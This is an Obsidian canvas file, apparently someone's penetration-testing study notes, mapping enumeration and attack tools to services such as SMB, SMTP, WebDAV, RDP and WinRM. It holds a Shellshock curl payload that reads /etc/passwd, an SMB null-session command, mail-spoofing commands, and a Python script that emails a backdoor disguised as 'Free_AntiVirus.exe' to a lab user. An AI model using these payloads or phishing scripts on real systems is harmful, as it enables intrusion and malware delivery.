{
	"nodes":[
		{"id":"dcfefe619f24a01d","type":"group","x":-1200,"y":7164,"width":4560,"height":2240,"label":"SMB/NetBIOS service"},
		{"id":"5b952a1e4ba77e00","type":"group","x":-1200,"y":10524,"width":3580,"height":840,"label":"WinRM service"},
		{"id":"ec90a1c5b1e373bf","type":"group","x":-1180,"y":4800,"width":1920,"height":1560,"label":"HTTP service"},
		{"id":"615ea9c87a502671","type":"group","x":-1200,"y":9484,"width":2400,"height":900,"label":"RDP service"},
		{"id":"6f0cd4d51e1826c2","type":"group","x":-1180,"y":2436,"width":2660,"height":760,"label":"SMTP service"},
		{"id":"3f582f4ce88174cf","type":"group","x":-1180,"y":3276,"width":1560,"height":1244,"label":"IIS - WebDAV services"},
		{"id":"b240454ee1e070c7","type":"group","x":-1200,"y":6500,"width":2440,"height":580,"label":"SNMP service"},
		{"id":"aa5070063fd94eb5","type":"group","x":-1191,"y":1100,"width":1831,"height":567,"label":"FTP service"},
		{"id":"6656494cb6135e90","type":"group","x":-1180,"y":1756,"width":1780,"height":580,"label":"SSH service"},
		{"id":"72cac4feffb7651d","type":"group","x":-660,"y":9540,"width":520,"height":190,"label":"$ msf"},
		{"id":"63d2b07eaf61abdf","x":-400,"y":3716,"width":760,"height":360,"type":"file","file":"mindmapa/tools/cadaver/WebDAV.md"},
		{"id":"796e7c1bca5c785e","type":"file","file":"mindmapa/tools/Metasploit/msf_smtp.md","x":-460,"y":2436,"width":560,"height":160},
		{"id":"a3615791fe81178e","type":"file","file":"mindmapa/tools/nmap/nmap_ftp.md","x":-520,"y":1120,"width":1040,"height":160},
		{"id":"0d88ef105470d10a","type":"file","file":"mindmapa/tools/Metasploit/msf_ftp.md","x":-520,"y":1307,"width":596,"height":120},
		{"id":"07b6529fbeffeffd","type":"text","text":"# FTP (T:20,21)\nused to facilitate file sharing between a server and client/clients and vice versa.","x":-1180,"y":1380,"width":400,"height":147},
		{"id":"5ef04a876fbef607","type":"text","text":"# $ ftp\n```bash\n$ ftp <IP> \n> user: anonymous  # anonymous login\n> password: password \n> ftp> ls \n> ftp> get filename.txt\n```","x":-520,"y":1434,"width":403,"height":213},
		{"id":"eb19960bac2334b3","type":"file","file":"mindmapa/tools/Metasploit/msf_ssh.md","x":-600,"y":2036,"width":1100,"height":180},
		{"id":"44d7b3a21ad2c749","type":"file","file":"mindmapa/tools/nmap/nmap_ssh.md","x":-599,"y":1776,"width":1020,"height":220},
		{"id":"1edf5a47125dd2a0","type":"text","text":"# SSH (T:22)\nSSH (Secure Shell) - SSH is a cryptographic remote access protocol that is used to remotely access and control systems over an unsecured network. SSH was developed as a secure successor to telnet.","x":-1160,"y":1927,"width":400,"height":209},
		{"id":"1dbf99a46ed130c2","type":"file","file":"mindmapa/tools/hydra/hydra_ssh.md","x":-600,"y":2236,"width":420,"height":50},
		{"id":"c07c8d0afb0212fd","type":"text","text":"MySQL (T:3306)","x":-3980,"y":6316,"width":400,"height":60},
		{"id":"121d120e5c92667e","type":"text","text":"# SCANNING SERVICES","x":-4100,"y":5876,"width":500,"height":165,"color":"1"},
		{"id":"f9c58e42eb6e05bd","type":"text","text":"MSSQL (T:1433)","x":-3980,"y":6236,"width":400,"height":60},
		{"id":"705a7f097377a2d4","type":"text","text":"Apache Tomcat (T:8080)","x":-3980,"y":6396,"width":400,"height":50},
		{"id":"7e9b55400f9f617f","type":"file","file":"mindmapa/tools/Metasploit/msf_webdav.md","x":-400,"y":4096,"width":760,"height":364},
		{"id":"eb58e2bf1cef99a7","type":"text","text":"# IIS - WebDAV (T:80/443)\nMicrosoft IIS (Internet Information Services) - Proprietary web server software developed by Microsoft that runs on Windows.  \nWebDAV (Web Distributed Authoring & Versioning) - HTTP extension that allows clients to update, delete, move and copy files on a web server. WebDAV is used to enable a web server to act as a file server.  \nSprawdzić nagłówkiem `HTTP OPTION` jakie opcje są dostępne  \nSupported executable file extensions: `.asp`, `.aspx`, `.config`, `.php`","x":-1160,"y":3576,"width":480,"height":320},
		{"id":"a11058f7a4e4cda7","type":"text","text":"# $ davtest\n\nDavtest is a WebDAV scanner that sends exploit files to the WebDAV server and automatically creates the directory and uploads different format types of files. The tool also tried to execute uploaded files and gives us an output of successfully executed files.\n\n```bash\n$ davtest -url http://10.0.16.177/webdav\n$ davtest -auth bob:password_123321 -url http://10.0.16.177/webdav\n```","x":-400,"y":3456,"width":660,"height":240},
		{"id":"50e5634d811ba130","type":"file","file":"mindmapa/tools/hydra/hydra_webdav.md","x":-400,"y":3296,"width":600,"height":160},
		{"id":"5e1a0de945d2d11f","type":"text","text":"# $ sendmail\n```bash\n$ sendemail -f admin@attacker.xyz -t root@openmailbox.xyz -s 192.26.29.3 -u Fakemail -m \"Hi root, a fake from admin\" -o tls=no\n```","x":-460,"y":2980,"width":600,"height":200},
		{"id":"d7cc82821064fd7d","type":"text","text":"```bash\n$ telnet <target_IP> 25\nHELO attacker.xyz\nmail from: admin@attacker.xyz\nrcpt to:root@openmailbox.xyz\ndata\nSubject: Hi Root\nHello,\nThis is a fake mail sent using telnet command.\nFrom,\nAdmin\n.\n# There is a dot(.) in the last line which indicates the termination of data.\n```","x":140,"y":2816,"width":560,"height":240},
		{"id":"fff5755fb62b1673","type":"text","text":"# SMTP (T:25/465/587)\nSimple Mail Transfer Protocol","x":-1160,"y":2716,"width":400,"height":100},
		{"id":"478fd974bea326a8","type":"text","text":"# python, send the malicious email to the `bob@ine.local.`\nhttps://www.geeksforgeeks.org/send-mail-attachment-gmail-account-using-python/\n```python\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\nfromaddr = \"attacker@fake.net\"\ntoaddr = \"bob@ine.local\"  \n# instance of MIMEMultipart\nmsg = MIMEMultipart()\n# storing the senders email address  \nmsg['From'] = fromaddr\n# storing the receivers email address \nmsg['To'] = toaddr\n# storing the subject \nmsg['Subject'] = \"Subject of the Mail\"\n# string to store the body of the mail\nbody = \"Body_of_the_mail\"\n# attach the body with the msg instance\nmsg.attach(MIMEText(body, 'plain'))\n# open the file to be sent \nfilename = \"Free_AntiVirus.exe\"\nattachment = open(\"/root/backdoor.exe\", \"rb\")\n# instance of MIMEBase and named as p\np = MIMEBase('application', 'octet-stream')\n# To change the payload into encoded form\np.set_payload((attachment).read())\n# encode into base64\nencoders.encode_base64(p)\np.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n# attach the instance 'p' to instance 'msg'\nmsg.attach(p)\n# creates SMTP session\ns = smtplib.SMTP('demo.ine.local', 25)\n# Converts the Multipart msg into a string\ntext = msg.as_string()\n# sending the mail\ns.sendmail(fromaddr, toaddr, text)\n# terminating the session\ns.quit()\n```","x":140,"y":2469,"width":1120,"height":297},
		{"id":"59caeca0f4661112","type":"file","file":"mindmapa/protocols/NetBIOS.md","x":-1140,"y":8380,"width":840,"height":760},
		{"id":"bd628c3de238ad15","type":"text","text":"# SMB (T:445)\nSMB/CIFS (Server Message Block Protocol) - (czasem oparty na protokole NetBIOS) Network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network (LAN).","x":-1100,"y":7300,"width":560,"height":160},
		{"id":"f9fb795ded8f4052","type":"text","text":"# psexec","x":-115,"y":8240,"width":250,"height":70},
		{"id":"37b74ef3657af659","type":"text","text":"# $ mount.cisf\n```bash\n$ mount.cifs //<IP>/<resource_name> </media/mount/dir> [user=<username>,pass=<passwd>] # mount SMB share in Linux, like net use\n```","x":720,"y":7170,"width":1300,"height":140},
		{"id":"84df055fb2d60570","type":"file","file":"mindmapa/tools/nmap/nmap_smb.md","x":720,"y":8196,"width":1060,"height":294},
		{"id":"83dfb88d3b8a82d3","type":"text","text":"# Zasoby automatycznie udostępniane przez Windows\n- **ADMIN$:** Udostępnia dostęp do katalogu systemowego (zazwyczaj `C:\\Windows`) na zdalnym komputerze. Jest to zasób, który ułatwia administrację systemem. **Przykład użycia:** Umożliwia zdalne zarządzanie plikami i folderami w katalogu systemowym, zdalne instalacje oprogramowania itp.\n- **IPC$ (Inter-Process Communication):** umożliwia komunikację międzyprocesową (Inter-Process Communication) między komputerami. Jest to zasób używany do przekazywania informacji między procesami na zdalnym komputerze. **Przykład użycia:** Umożliwia zdalne wykonywanie poleceń i inne operacje, które wymagają komunikacji międzyprocesowej.\n- **C$:** Udostępnia dostęp do dysku C na zdalnym komputerze. Jest to zasób, który umożliwia zdalne zarządzanie zawartością dysku C, w tym przeglądanie, kopiowanie plików, zdalne instalacje oprogramowania, i inne operacje administracyjne. **Przykład użycia:** Pozwala na zdalne przeglądanie, zarządzanie i manipulację plikami i folderami na dysku C zdalnego komputera.","x":-960,"y":7980,"width":760,"height":360},
		{"id":"ebcbb3bf478824db","type":"text","text":"# $ nmblookup\n\n```bash\n# NetBIOS over TCP/IP client used to lookup NetBIOS names\n$ nmblookup -A <IP>\n```","x":-1065,"y":9220,"width":690,"height":160},
		{"id":"26b22c168eac83b4","type":"file","file":"mindmapa/tools/Metasploit/msf_smb.md","x":720,"y":8529,"width":560,"height":270},
		{"id":"22247ff212d21755","type":"text","text":"# Null sesion attack\na malicious user can establish connection to a Windows system without providing any username or password. Connection must be stablished to administrative share `IPC$`.\n```PowerShell\nC:\\> net use \\\\<IP>\\IPC$ \"\" /u:\"\" # NetBIOS/SMB Null session attack\n```","x":-290,"y":8760,"width":460,"height":460},
		{"id":"a8724ff26c686ab7","type":"file","file":"mindmapa/tools/Metasploit/msf_psexec.md","x":395,"y":8867,"width":565,"height":273},
		{"id":"6bfacf79fbfa8f1c","type":"file","file":"mindmapa/tools/impacket/impacket_psexec_smbexec.md","x":260,"y":9156,"width":660,"height":168},
		{"id":"137f43619df7a1c5","type":"file","file":"mindmapa/tools/crackmapexec/crackmapexec_smb.md","x":910,"y":7342,"width":920,"height":405},
		{"id":"a6209b114ccc682f","type":"text","text":"# $ enum4linux\nTool for enumerating information from Windows and Samba systems.  \nWrapper around rpcclient, net, nmblookup, smbclient\n```bash\n$ enum4linux <IP> # enumerating basic NetBIOS/SMB information\n$ enum4linux <IP> -v # enumerating basic NetBIOS/SMB information verbose mode, show commands that runs\n$ enum4linux <IP> -a# enumerating all simple NetBIOS/SMB information\n$ enum4linux <IP> -u <user> -p <passwd># log as user and enumerate NetBIOS/SMB information\n```","x":1920,"y":7544,"width":1020,"height":240},
		{"id":"9f5b2d11782c05b9","type":"text","text":"# $ smbclient\n```bash\n$ smbclient -L <IP> # list all shares from <IP>, Anonymous login\n$ smbclient -L <IP> -N # List all available shares on the samba server, no password\n$ smbclient \\\\\\\\<IP>\\\\<share> # connect to share with NULL session, >password: press Enter\n$ smbclient \\\\\\\\<IP>\\\\\\\\<share> -U <user> # connect to share, check if share exist\n$ smbclient \\\\\\\\<IP>\\\\<share> -U <user> -N # connect to share, no password provided\n$ smbclient \\\\\\\\<IP>\\\\<share> -U <user> [--password=<passwd>] # connect to share, as user, use password\n$ smbclient \\\\\\\\<IP>\\\\<share> -U <user> [--pw-nt-hash=<NT_hash>] # connect to share, as user, use NT Hash\n```","x":1920,"y":7784,"width":1120,"height":300},
		{"id":"ee127de62a87e517","type":"text","text":"# $ rpcclient\nhttps://www.hackingarticles.in/active-directory-enumeration-rpcclient/\n```bash\n$ rpcclient -N -U \"\" <IP> # connect to <IP> using NetBIOS/SMB/RPC; null session, \n$ rpcclient -U [<domain/>]<user>[<%passwd>] <IP> # NetBIOS/SMB login to host\n$ rpcclient <commands>help, enumdomusers,enumdomgroups, lookupnames <user>,anumalsgroups, srvinfo, queryuser, enumprivs # usefull commands after logging in\n```","x":1920,"y":8120,"width":1220,"height":220},
		{"id":"cf009e78081e5d6b","type":"file","file":"mindmapa/tools/Metasploit/msf_winrm.md","x":-320,"y":10561,"width":680,"height":240},
		{"id":"79a947b88b1fecbd","type":"file","file":"mindmapa/tools/crackmapexec/crackmapexec_winrm.md","x":-320,"y":10821,"width":687,"height":206},
		{"id":"c0405c81544814d5","type":"file","file":"mindmapa/tools/crackmapexec/crackmapexec_passthehash.md","x":820,"y":10681,"width":660,"height":200},
		{"id":"171a1e0ec152519d","type":"file","file":"mindmapa/tools/evil-WinRM/evil-WinRM passthehash.md","x":820,"y":10924,"width":817,"height":122},
		{"id":"e1f2694c648bd3a0","type":"text","text":"# WinRM (HTTP: 5985/ HTTPS: 5986)\nWindows Remote Management Protocol - Windows remote management protocol that can be used to facilitate remote access with Windows systems. (Execute commands on remote machine)\nhttps://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/","x":-1180,"y":10724,"width":520,"height":200},
		{"id":"3c79f8a36c9d0d5b","type":"file","file":"mindmapa/tools/evil-WinRM/evil-WinRM.md","x":-360,"y":11046,"width":820,"height":258},
		{"id":"66cb93ad49805438","type":"file","file":"mindmapa/tools/evil-WinRM/evil-WinRM file transfer.md","x":820,"y":11080,"width":802,"height":174},
		{"id":"19e755d9bb4ede7e","type":"text","text":"# $ msf - BlueKeep(vulnerability)","x":-640,"y":9620,"width":460,"height":100},
		{"id":"7ecc43d1128ec857","type":"file","file":"mindmapa/tools/xfreerdp/xfreerdp.md","x":-620,"y":9760,"width":660,"height":191},
		{"id":"1cae2656738d720b","type":"file","file":"mindmapa/tools/hydra/hydra_rdp.md","x":-620,"y":10024,"width":800,"height":300},
		{"id":"cc1a042dde5e293c","type":"file","file":"mindmapa/tools/xfreerdp/xfreerdp_passthehash.md","x":260,"y":9620,"width":920,"height":344},
		{"id":"a0432fb6fb646752","type":"text","text":"# $ msf - rdp_scanner","x":-640,"y":9560,"width":340,"height":60},
		{"id":"02e20d80f1c173f3","type":"text","text":"# RDP (T:3389)\nRemote Desktop Protocol - Proprietary GUI remote access protocol developed by Microsoft and is used to remotely authenticate and interact with a Windows system.","x":-1180,"y":9640,"width":400,"height":180},
		{"id":"ce467c6a5dc9f314","type":"text","text":"# $ rdesktop\n```bash\n$ rdesktop <IP> –u <user> –p <passwd>\n```","x":-1110,"y":9951,"width":390,"height":133},
		{"id":"b198fb6f4b7f56fe","type":"text","text":"# HTTP file server (T:80)","x":-1740,"y":6440,"width":400,"height":80},
		{"id":"782bc7c85a17c2a5","type":"text","text":"# SNMP (T:161;U:161)\n**Simple Network Management Protocol**\n\npobrać snmp-mibs-downloader i zainstalować comment out 4th line in /etc/snmp/snmp.conf","x":-1180,"y":6720,"width":560,"height":200},
		{"id":"ec34d06360c66048","type":"file","file":"mindmapa/tools/nmap/nmap_smtp.md","x":-220,"y":6520,"width":1440,"height":240},
		{"id":"5de23563c3e7e487","type":"file","file":"mindmapa/tools/snmpwalk/snmpwalk.md","x":-220,"y":6800,"width":1060,"height":160},
		{"id":"47adb36f3add2a50","type":"text","text":"# $ snmpset","x":-220,"y":6960,"width":250,"height":60},
		{"id":"768cdafe36159abe","type":"text","text":"# $ http\n\n```bash\n$ http <IP>\n```","x":-400,"y":5320,"width":220,"height":120},
		{"id":"3301c696b9267540","type":"text","text":"# $ browsh\n\n```bash\n$ browsh --startup-url http://10.0.29.163/Default.aspx\n```","x":-400,"y":5460,"width":360,"height":200},
		{"id":"c395828f2412ecfe","type":"file","file":"mindmapa/tools/nmap/nmap_shellshock.md","x":-140,"y":5640,"width":800,"height":200},
		{"id":"086c04609b813a8d","type":"file","file":"mindmapa/tools/Metasploit/msf_shellshock.md","x":-140,"y":5880,"width":720,"height":200},
		{"id":"44eb844cdfbaf594","type":"text","text":"# Shellshock\n\n```bash\ncurl -H \"user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'\" \\\nhttp://localhost:8080/cgi-bin/vulnerable\n```","x":-700,"y":5760,"width":440,"height":240},
		{"id":"ef4f592352746bcf","type":"text","text":"# $ whatweb\n\n```bash\n$ whatweb <IP>\n```","x":-400,"y":5140,"width":260,"height":160},
		{"id":"d0c34079735d59ef","type":"text","text":"# HTTP web server (T:80)\n","x":-1160,"y":5180,"width":480,"height":220},
		{"id":"1a7b8a24c0e71e8c","type":"file","file":"mindmapa/tools/Metasploit/msf_http.md","x":-400,"y":4820,"width":760,"height":300}
	],
	"edges":[
		{"id":"42515e935c3a3ebb","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"07b6529fbeffeffd","toSide":"left"},
		{"id":"88c4ef551ebaa2fe","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"1edf5a47125dd2a0","toSide":"left"},
		{"id":"0fe6dfcf946aea82","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"fff5755fb62b1673","toSide":"left"},
		{"id":"6b1c4c1b0e92861a","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"eb58e2bf1cef99a7","toSide":"left"},
		{"id":"18d81dc52fc38e5b","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"d0c34079735d59ef","toSide":"left"},
		{"id":"120cc15f8a576b8c","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"b198fb6f4b7f56fe","toSide":"left"},
		{"id":"0e3ea014f46930d7","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"782bc7c85a17c2a5","toSide":"left"},
		{"id":"f11cb1b687c93b2a","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"bd628c3de238ad15","toSide":"left"},
		{"id":"9dbc1f0d7f5f631c","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"f9c58e42eb6e05bd","toSide":"left"},
		{"id":"9158a32f6f5b2311","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"c07c8d0afb0212fd","toSide":"left"},
		{"id":"89737c9273ab54a5","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"02e20d80f1c173f3","toSide":"left"},
		{"id":"59278ff1c9954bae","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"e1f2694c648bd3a0","toSide":"left"},
		{"id":"b1ef3a499ff2ad7f","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"705a7f097377a2d4","toSide":"left"},
		{"id":"721b3c5d089a89ab","fromNode":"07b6529fbeffeffd","fromSide":"right","toNode":"a3615791fe81178e","toSide":"left","label":"$ nmap"},
		{"id":"c254f685f4b8f3ec","fromNode":"07b6529fbeffeffd","fromSide":"right","toNode":"0d88ef105470d10a","toSide":"left","label":"$ msf"},
		{"id":"41c8fdd79249f27e","fromNode":"07b6529fbeffeffd","fromSide":"right","toNode":"5ef04a876fbef607","toSide":"left","label":"$ ftp"},
		{"id":"85220bf75078cd85","fromNode":"1edf5a47125dd2a0","fromSide":"right","toNode":"44d7b3a21ad2c749","toSide":"left","label":"$ nmap"},
		{"id":"b37568f9f13596c4","fromNode":"1edf5a47125dd2a0","fromSide":"right","toNode":"1dbf99a46ed130c2","toSide":"left","label":"$ hydra"},
		{"id":"02f6566a92c5ecdd","fromNode":"1edf5a47125dd2a0","fromSide":"right","toNode":"eb19960bac2334b3","toSide":"left","label":"$ msf"},
		{"id":"a9b5f779b26daf0f","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"796e7c1bca5c785e","toSide":"left","label":"$ msf"},
		{"id":"2f1269d09c74f27d","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"d7cc82821064fd7d","toSide":"left","label":"send fake mail"},
		{"id":"efbd770e3c94c3df","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"5e1a0de945d2d11f","toSide":"left","label":"$ sendmail"},
		{"id":"1d212fdee499a9cf","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"50e5634d811ba130","toSide":"left","label":"$ hydra"},
		{"id":"5102c649a4ee2c1c","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"a11058f7a4e4cda7","toSide":"left","label":"$ davtest"},
		{"id":"4e69604802a64bab","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"63d2b07eaf61abdf","toSide":"left","label":"$ cadevar"},
		{"id":"e09f1660bb07d62a","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"7e9b55400f9f617f","toSide":"left","label":"$ msf"},
		{"id":"2083cb5dbc5e2e2f","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"ef4f592352746bcf","toSide":"left","label":"$ whatweb"},
		{"id":"5df781256605b5c6","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"768cdafe36159abe","toSide":"left","label":"$ http"},
		{"id":"9af62070d5251e62","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"3301c696b9267540","toSide":"left","label":"$ browsh"},
		{"id":"8d935614b4f3cdd8","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"1a7b8a24c0e71e8c","toSide":"left","label":"$ msf"},
		{"id":"a6233812878339ee","fromNode":"44eb844cdfbaf594","fromSide":"right","toNode":"c395828f2412ecfe","toSide":"left","label":"$ nmap"},
		{"id":"a542c3d4a39b428b","fromNode":"44eb844cdfbaf594","fromSide":"right","toNode":"086c04609b813a8d","toSide":"left","label":"$ msf"},
		{"id":"98f1b5103ae5de64","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"44eb844cdfbaf594","toSide":"left","label":"Apache Web Server (T:80/443)"},
		{"id":"f0dcb69969bb00ae","fromNode":"782bc7c85a17c2a5","fromSide":"right","toNode":"5de23563c3e7e487","toSide":"left","label":"$ snmpwalk"},
		{"id":"33ae7a33a0cd7ee1","fromNode":"782bc7c85a17c2a5","fromSide":"right","toNode":"ec34d06360c66048","toSide":"left","label":"$ nmap"},
		{"id":"3fd31f70f605c616","fromNode":"782bc7c85a17c2a5","fromSide":"right","toNode":"47adb36f3add2a50","toSide":"left","label":"$ snmpset"},
		{"id":"133ea7e144e48509","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"83dfb88d3b8a82d3","toSide":"top"},
		{"id":"777c3c0acada1f7b","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"59caeca0f4661112","toSide":"left"},
		{"id":"4232fc614ce5adf0","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"37b74ef3657af659","toSide":"left","label":"$ mount.cisf"},
		{"id":"a598cfdbb1ad99eb","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"a6209b114ccc682f","toSide":"left","label":"$ enum4linux"},
		{"id":"1737baf4cd61cf8f","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"9f5b2d11782c05b9","toSide":"left","label":"$ smbclient"},
		{"id":"946bfa5b17d77801","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"ee127de62a87e517","toSide":"left","label":"$ rpcclient"},
		{"id":"5e2020de02f3abe0","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"84df055fb2d60570","toSide":"left","label":"$ nmap"},
		{"id":"81ab59e8a1322df8","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"26b22c168eac83b4","toSide":"left","label":"$ msf"},
		{"id":"ba2ce72231a7660b","fromNode":"f9fb795ded8f4052","fromSide":"right","toNode":"a8724ff26c686ab7","toSide":"top","label":"$ msf"},
		{"id":"9fc0163d51f21dca","fromNode":"f9fb795ded8f4052","fromSide":"bottom","toNode":"6bfacf79fbfa8f1c","toSide":"top","label":"$ impacket"},
		{"id":"8d12e20183779c40","fromNode":"59caeca0f4661112","fromSide":"bottom","toNode":"ebcbb3bf478824db","toSide":"top","label":"$ nmblookup"},
		{"id":"fea37b0c3f8e12d3","fromNode":"02e20d80f1c173f3","fromSide":"right","toNode":"72cac4feffb7651d","toSide":"left","label":"$ msf"},
		{"id":"828b9c4ac068f334","fromNode":"02e20d80f1c173f3","fromSide":"right","toNode":"7ecc43d1128ec857","toSide":"left","label":"$ xfreerdp"},
		{"id":"a0d35af007b61692","fromNode":"7ecc43d1128ec857","fromSide":"right","toNode":"cc1a042dde5e293c","toSide":"left","label":" passthehash"},
		{"id":"98bba66f145acdd1","fromNode":"e1f2694c648bd3a0","fromSide":"right","toNode":"cf009e78081e5d6b","toSide":"left","label":"$ msf"},
		{"id":"1b9e2fd0e5b9f703","fromNode":"e1f2694c648bd3a0","fromSide":"right","toNode":"79a947b88b1fecbd","toSide":"left","label":"$ crackmapexec"},
		{"id":"a65c196340c5bad8","fromNode":"79a947b88b1fecbd","fromSide":"right","toNode":"c0405c81544814d5","toSide":"left","label":"passthehash"},
		{"id":"fc56ef2f477ec43d","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"22247ff212d21755","toSide":"top"},
		{"id":"72a6a88c80ae34ce","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"f9fb795ded8f4052","toSide":"top"},
		{"id":"d993e2b3be8dca51","fromNode":"e1f2694c648bd3a0","fromSide":"right","toNode":"3c79f8a36c9d0d5b","toSide":"left","label":"$ evil-winrm"},
		{"id":"f3606bf646cacfd0","fromNode":"3c79f8a36c9d0d5b","fromSide":"right","toNode":"171a1e0ec152519d","toSide":"left","label":"passthehash"},
		{"id":"af545224e4af6131","fromNode":"3c79f8a36c9d0d5b","fromSide":"right","toNode":"66cb93ad49805438","toSide":"left","label":"file transfer"},
		{"id":"aef126cfca0ef13c","fromNode":"02e20d80f1c173f3","fromSide":"right","toNode":"1cae2656738d720b","toSide":"left","label":"$ hydra"},
		{"id":"b7bcdf2a747246bc","fromNode":"26b22c168eac83b4","fromSide":"bottom","toNode":"a8724ff26c686ab7","toSide":"top"},
		{"id":"1cec4af1cea93d34","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"478fd974bea326a8","toSide":"left","label":"send fake mail with python"},
		{"id":"f280c1df05fbf0d3","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"137f43619df7a1c5","toSide":"left","label":"$ crackmapexec"},
		{"id":"4252c42c447cdb05","fromNode":"02e20d80f1c173f3","fromSide":"bottom","toNode":"ce467c6a5dc9f314","toSide":"top"}
	]
}